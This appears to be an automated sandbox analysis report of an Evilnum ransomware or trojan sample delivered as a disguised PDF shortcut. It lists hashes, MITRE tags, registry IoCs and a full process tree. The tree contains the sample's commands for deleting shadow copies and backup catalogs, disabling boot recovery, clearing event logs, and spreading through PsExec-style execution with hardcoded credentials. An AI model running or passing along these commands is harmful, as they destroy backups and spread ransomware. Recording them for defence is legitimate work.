evilnum | 0d878b1b9f5c1ae8925e55df9e10b4271eb99970af133e251830044d24296ba8

Analysis

max time kernel
150s
max time network
151s
platform
windows10_x64
resource
win10v20201028
submitted
26-12-2020 20:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f5f79e2169db3bbe7b7ae3ff4a0f40659d11051e69ee784f5469659a708e829e.lnk
Size

938KB
MD5

cb908352d719b9e0a7142c4110ae502e
SHA1

e50a8c33b315517a4bad5eb35fb09e572c3ee9fa
SHA256

f5f79e2169db3bbe7b7ae3ff4a0f40659d11051e69ee784f5469659a708e829e
SHA512

9502d7c069532571277e3c8c849e9ce81130a11bf5ad892dad688aa9e53973abc76fb5b53aee72ca37fe29e50aa2543f2681a6d849ada59b9e07ff6e3b574909

Score

10^/10

evilnum evasion ransomware trojan

Malware Config

Signatures

Evilnum
A malware family with multiple components distributed through LNK files.
trojan evilnum
Clears Windows event logs 1 TTPs
evasion ransomware

Indicator Removal on Host
T1070
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

3820 bcdedit.exe
252 bcdedit.exe
Deletes backup catalog 3 TTPs 1 IoCs
Uses wbadmin.exe to inhibit system recovery.
ransomware

Command-Line Interface
T1059

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

wbadmin.exe

pid process

3568 wbadmin.exe

pid	process
3820	bcdedit.exe
252	bcdedit.exe

pid	process
3568	wbadmin.exe

Executes dropped EXE 155 IoCs

Processes:

vfrkl.exe_umx.exe_fif.exe_fif.exe_fif.exe_fif.exePSEXESVC.exe_ple.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_ple.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_ple.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_ple.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_ple.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe

pid	process
412	vfrkl.exe
3428	_umx.exe
4088	_fif.exe
2600	_fif.exe
3908	_fif.exe
3060	_fif.exe
1856	PSEXESVC.exe
1892	_ple.exe
2672	_fif.exe
3212	_fif.exe
3236	_fif.exe
1516	_fif.exe
2632	_fif.exe
3120	_fif.exe
892	_fif.exe
496	_fif.exe
188	_ple.exe
1860	_fif.exe
1940	_fif.exe
2340	_fif.exe
4196	_fif.exe
4208	_fif.exe
4344	_ple.exe
4332	_fif.exe
4384	_fif.exe
4424	_fif.exe
4536	_fif.exe
4604	_fif.exe
4716	_fif.exe
4728	_fif.exe
4840	_ple.exe
4816	_fif.exe
4828	_fif.exe
4908	_fif.exe
5024	_fif.exe
5072	_fif.exe
5116	_ple.exe
4152	_fif.exe
1888	_fif.exe
2916	_fif.exe
1032	_fif.exe
4300	_fif.exe
4308	_fif.exe
4212	_fif.exe
4056	_fif.exe
4176	_fif.exe
4360	_fif.exe
4440	_fif.exe
4504	_fif.exe
4596	_fif.exe
4680	_fif.exe
4660	_fif.exe
4784	_fif.exe
4760	_fif.exe
4636	_fif.exe
4856	_fif.exe
4820	_fif.exe
4996	_fif.exe
5052	_fif.exe
1196	_fif.exe
5104	_fif.exe
3796	_fif.exe
4320	_fif.exe
4160	_fif.exe

Drops file in Windows directory 9 IoCs

Processes:

_fif.exe_fif.exenotepad.exenotepad.exenotepad.exenotepad.exe_fif.exe_fif.exenotepad.exe

description	ioc	process
File created	C:\Windows\PSEXESVC.exe	_fif.exe
File created	C:\Windows\PSEXESVC.exe	_fif.exe
File opened for modification	C:\Windows\_ple.exe	notepad.exe
File opened for modification	C:\Windows\_ple.exe	notepad.exe
File opened for modification	C:\Windows\_ple.exe	notepad.exe
File opened for modification	C:\Windows\_ple.exe	notepad.exe
File created	C:\Windows\PSEXESVC.exe	_fif.exe
File created	C:\Windows\PSEXESVC.exe	_fif.exe
File opened for modification	C:\Windows\_ple.exe	notepad.exe

Checks SCSI registry key(s) 3 TTPs 4 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

vds.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName	vds.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName	vds.exe

Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

4000 vssadmin.exe

pid	process
4000	vssadmin.exe

Modifies data under HKEY_USERS 296 IoCs

Processes:

_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe_fif.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

vfrkl.exe

pid process

412 vfrkl.exe
412 vfrkl.exe
412 vfrkl.exe
412 vfrkl.exe
412 vfrkl.exe
412 vfrkl.exe

Suspicious use of AdjustPrivilegeToken 84 IoCs

Processes:

_ftf.exevfrkl.exe_umx.exevssvc.exe_ple.exewbengine.exe_ple.exe_fif.exe_ple.exewevtutil.exe_ple.exe

description	pid	process
Token: SeAssignPrimaryTokenPrivilege	1740	_ftf.exe
Token: SeIncreaseQuotaPrivilege	1740	_ftf.exe
Token: SeSecurityPrivilege	1740	_ftf.exe
Token: SeTakeOwnershipPrivilege	1740	_ftf.exe
Token: SeLoadDriverPrivilege	1740	_ftf.exe
Token: SeSystemtimePrivilege	1740	_ftf.exe
Token: SeBackupPrivilege	1740	_ftf.exe
Token: SeRestorePrivilege	1740	_ftf.exe
Token: SeShutdownPrivilege	1740	_ftf.exe
Token: SeSystemEnvironmentPrivilege	1740	_ftf.exe
Token: SeUndockPrivilege	1740	_ftf.exe
Token: SeManageVolumePrivilege	1740	_ftf.exe
Token: SeDebugPrivilege	412	vfrkl.exe
Token: SeShutdownPrivilege	3428	_umx.exe
Token: SeBackupPrivilege	612	vssvc.exe
Token: SeRestorePrivilege	612	vssvc.exe
Token: SeAuditPrivilege	612	vssvc.exe
Token: SeAssignPrimaryTokenPrivilege	1892	_ple.exe
Token: SeIncreaseQuotaPrivilege	1892	_ple.exe
Token: SeSecurityPrivilege	1892	_ple.exe
Token: SeTakeOwnershipPrivilege	1892	_ple.exe
Token: SeLoadDriverPrivilege	1892	_ple.exe
Token: SeSystemtimePrivilege	1892	_ple.exe
Token: SeBackupPrivilege	1892	_ple.exe
Token: SeRestorePrivilege	1892	_ple.exe
Token: SeShutdownPrivilege	1892	_ple.exe
Token: SeSystemEnvironmentPrivilege	1892	_ple.exe
Token: SeUndockPrivilege	1892	_ple.exe
Token: SeManageVolumePrivilege	1892	_ple.exe
Token: SeBackupPrivilege	264	wbengine.exe
Token: SeRestorePrivilege	264	wbengine.exe
Token: SeSecurityPrivilege	264	wbengine.exe
Token: SeAssignPrimaryTokenPrivilege	188	_ple.exe
Token: SeIncreaseQuotaPrivilege	188	_ple.exe
Token: SeSecurityPrivilege	188	_ple.exe
Token: SeTakeOwnershipPrivilege	188	_ple.exe
Token: SeLoadDriverPrivilege	188	_ple.exe
Token: SeSystemtimePrivilege	188	_ple.exe
Token: SeBackupPrivilege	188	_ple.exe
Token: SeRestorePrivilege	188	_ple.exe
Token: SeShutdownPrivilege	188	_ple.exe
Token: SeSystemEnvironmentPrivilege	188	_ple.exe
Token: SeUndockPrivilege	188	_ple.exe
Token: SeManageVolumePrivilege	188	_ple.exe
Token: SeSecurityPrivilege	4220	_fif.exe
Token: SeBackupPrivilege	4220	_fif.exe
Token: SeAssignPrimaryTokenPrivilege	4344	_ple.exe
Token: SeIncreaseQuotaPrivilege	4344	_ple.exe
Token: SeSecurityPrivilege	4344	_ple.exe
Token: SeTakeOwnershipPrivilege	4344	_ple.exe
Token: SeLoadDriverPrivilege	4344	_ple.exe
Token: SeSystemtimePrivilege	4344	_ple.exe
Token: SeBackupPrivilege	4344	_ple.exe
Token: SeRestorePrivilege	4344	_ple.exe
Token: SeShutdownPrivilege	4344	_ple.exe
Token: SeSystemEnvironmentPrivilege	4344	_ple.exe
Token: SeUndockPrivilege	4344	_ple.exe
Token: SeManageVolumePrivilege	4344	_ple.exe
Token: SeSecurityPrivilege	4664	wevtutil.exe
Token: SeBackupPrivilege	4664	wevtutil.exe
Token: SeAssignPrimaryTokenPrivilege	4840	_ple.exe
Token: SeIncreaseQuotaPrivilege	4840	_ple.exe
Token: SeSecurityPrivilege	4840	_ple.exe
Token: SeTakeOwnershipPrivilege	4840	_ple.exe

Suspicious use of WriteProcessMemory 519 IoCs

Processes:

cmd.execmd.exePSEXESVC.exe_ftf.exe_umx.execmd.execmd.exePSEXESVC.exe_ple.exe

description	pid	process	target process
PID 1108 wrote to memory of 4004	1108	cmd.exe	cmd.exe
PID 1108 wrote to memory of 4004	1108	cmd.exe	cmd.exe
PID 4004 wrote to memory of 3988	4004	cmd.exe	cmd.exe
PID 4004 wrote to memory of 3988	4004	cmd.exe	cmd.exe
PID 4004 wrote to memory of 3288	4004	cmd.exe	find.exe
PID 4004 wrote to memory of 3288	4004	cmd.exe	find.exe
PID 4004 wrote to memory of 3208	4004	cmd.exe	wscript.exe
PID 4004 wrote to memory of 3208	4004	cmd.exe	wscript.exe
PID 1352 wrote to memory of 1740	1352	PSEXESVC.exe	_ftf.exe
PID 1352 wrote to memory of 1740	1352	PSEXESVC.exe	_ftf.exe
PID 1352 wrote to memory of 1740	1352	PSEXESVC.exe	_ftf.exe
PID 1740 wrote to memory of 412	1740	_ftf.exe	vfrkl.exe
PID 1740 wrote to memory of 412	1740	_ftf.exe	vfrkl.exe
PID 1740 wrote to memory of 3428	1740	_ftf.exe	_umx.exe
PID 1740 wrote to memory of 3428	1740	_ftf.exe	_umx.exe
PID 1740 wrote to memory of 3428	1740	_ftf.exe	_umx.exe
PID 3428 wrote to memory of 3980	3428	_umx.exe	cmd.exe
PID 3428 wrote to memory of 3980	3428	_umx.exe	cmd.exe
PID 1740 wrote to memory of 4088	1740	_ftf.exe	_fif.exe
PID 1740 wrote to memory of 4088	1740	_ftf.exe	_fif.exe
PID 1740 wrote to memory of 4088	1740	_ftf.exe	_fif.exe
PID 1740 wrote to memory of 2600	1740	_ftf.exe	_fif.exe
PID 1740 wrote to memory of 2600	1740	_ftf.exe	_fif.exe
PID 1740 wrote to memory of 2600	1740	_ftf.exe	_fif.exe
PID 1740 wrote to memory of 3908	1740	_ftf.exe	_fif.exe
PID 1740 wrote to memory of 3908	1740	_ftf.exe	_fif.exe
PID 1740 wrote to memory of 3908	1740	_ftf.exe	_fif.exe
PID 3980 wrote to memory of 4000	3980	cmd.exe	vssadmin.exe
PID 3980 wrote to memory of 4000	3980	cmd.exe	vssadmin.exe
PID 1740 wrote to memory of 3060	1740	_ftf.exe	_fif.exe
PID 1740 wrote to memory of 3060	1740	_ftf.exe	_fif.exe
PID 1740 wrote to memory of 3060	1740	_ftf.exe	_fif.exe
PID 3428 wrote to memory of 2164	3428	_umx.exe	cmd.exe
PID 3428 wrote to memory of 2164	3428	_umx.exe	cmd.exe
PID 1740 wrote to memory of 2672	1740	_ftf.exe	_fif.exe
PID 2164 wrote to memory of 3568	2164	cmd.exe	wbadmin.exe
PID 2164 wrote to memory of 3568	2164	cmd.exe	wbadmin.exe
PID 1856 wrote to memory of 1892	1856	PSEXESVC.exe	_ple.exe
PID 1856 wrote to memory of 1892	1856	PSEXESVC.exe	_ple.exe
PID 1856 wrote to memory of 1892	1856	PSEXESVC.exe	_ple.exe
PID 1740 wrote to memory of 2672	1740	_ftf.exe	_fif.exe
PID 1740 wrote to memory of 2672	1740	_ftf.exe	_fif.exe
PID 1892 wrote to memory of 2872	1892	_ple.exe	notepad.exe
PID 1892 wrote to memory of 2872	1892	_ple.exe	notepad.exe
PID 1892 wrote to memory of 2872	1892	_ple.exe	notepad.exe
PID 1892 wrote to memory of 2872	1892	_ple.exe	notepad.exe
PID 1892 wrote to memory of 2872	1892	_ple.exe	notepad.exe
PID 1740 wrote to memory of 3212	1740	_ftf.exe	_fif.exe
PID 1740 wrote to memory of 3212	1740	_ftf.exe	_fif.exe
PID 1740 wrote to memory of 3212	1740	_ftf.exe	_fif.exe
PID 1740 wrote to memory of 3236	1740	_ftf.exe	_fif.exe
PID 1740 wrote to memory of 3236	1740	_ftf.exe	_fif.exe
PID 1740 wrote to memory of 3236	1740	_ftf.exe	_fif.exe
PID 1740 wrote to memory of 1516	1740	_ftf.exe	_fif.exe
PID 1740 wrote to memory of 1516	1740	_ftf.exe	_fif.exe
PID 1740 wrote to memory of 1516	1740	_ftf.exe	_fif.exe
PID 1740 wrote to memory of 2632	1740	_ftf.exe	_fif.exe
PID 1740 wrote to memory of 2632	1740	_ftf.exe	_fif.exe
PID 1740 wrote to memory of 2632	1740	_ftf.exe	_fif.exe
PID 1740 wrote to memory of 3120	1740	_ftf.exe	_fif.exe
PID 1740 wrote to memory of 3120	1740	_ftf.exe	_fif.exe
PID 1740 wrote to memory of 3120	1740	_ftf.exe	_fif.exe
PID 1740 wrote to memory of 892	1740	_ftf.exe	_fif.exe
PID 1740 wrote to memory of 892	1740	_ftf.exe	_fif.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\f5f79e2169db3bbe7b7ae3ff4a0f40659d11051e69ee784f5469659a708e829e.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:1108

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c path=C:\Windows\system32&move "VerificationDocuments.pdf.lnk " "C:\Users\Admin\AppData\Local\Temp\1.lnk"&type "C:\Users\Admin\AppData\Local\Temp\1.lnk"|find "END2">"C:\Users\Admin\AppData\Local\Temp\0.js"&wscript "C:\Users\Admin\AppData\Local\Temp\0.js"
2⤵
- Suspicious use of WriteProcessMemory
PID:4004

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" type "C:\Users\Admin\AppData\Local\Temp\1.lnk""
3⤵
PID:3988

C:\Windows\system32\find.exe
find "END2"
3⤵
PID:3288

C:\Windows\system32\wscript.exe
wscript "C:\Users\Admin\AppData\Local\Temp\0.js"
3⤵
PID:3208

C:\Windows\PSEXESVC.exe
C:\Windows\PSEXESVC.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:1352

C:\Windows\_ftf.exe
"_ftf.exe"
2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1740

C:\Windows\TEMP\vfrkl.exe
123 \\.\pipe\280E9885-CDBC-4DAE-8FA4-2E26A1A5442E
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:412

C:\Windows\TEMP\_umx.exe
"C:\Windows\TEMP\_umx.exe"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3428

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
4⤵
- Suspicious use of WriteProcessMemory
PID:3980

\??\c:\Windows\system32\vssadmin.exe
c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
5⤵
- Interacts with shadow copies
PID:4000

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wbadmin.exe delete catalog -quiet
4⤵
- Suspicious use of WriteProcessMemory
PID:2164

C:\Windows\system32\wbadmin.exe
wbadmin.exe delete catalog -quiet
5⤵
- Deletes backup catalog
PID:3568

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
4⤵
PID:3732

C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
5⤵
- Modifies boot configuration data using bcdedit
PID:3820

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
5⤵
- Modifies boot configuration data using bcdedit
PID:252

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wevtutil.exe cl System
4⤵
PID:4116

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl System
5⤵
PID:4220

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wevtutil.exe cl Security
4⤵
PID:4448

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl Security
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4664

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\igmp.mcast.net -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Executes dropped EXE
PID:4088

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\Ewycradz -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2600

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\Ewycradz -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:3908

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\Ewycradz -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:3060

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\10.10.0.65 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Executes dropped EXE
PID:2672

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Executes dropped EXE
PID:3236

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\10.10.0.94 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Executes dropped EXE
PID:3212

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Executes dropped EXE
PID:1516

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\Ewycradz -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2632

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\224.0.0.22 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Executes dropped EXE
PID:3120

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Executes dropped EXE
PID:892

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Executes dropped EXE
PID:496

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\Ewycradz -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1860

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1940

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Executes dropped EXE
PID:2340

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4196

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4208

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\igmp.mcast.net -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Executes dropped EXE
PID:4332

C:\Windows\TEMP\_fif.exe
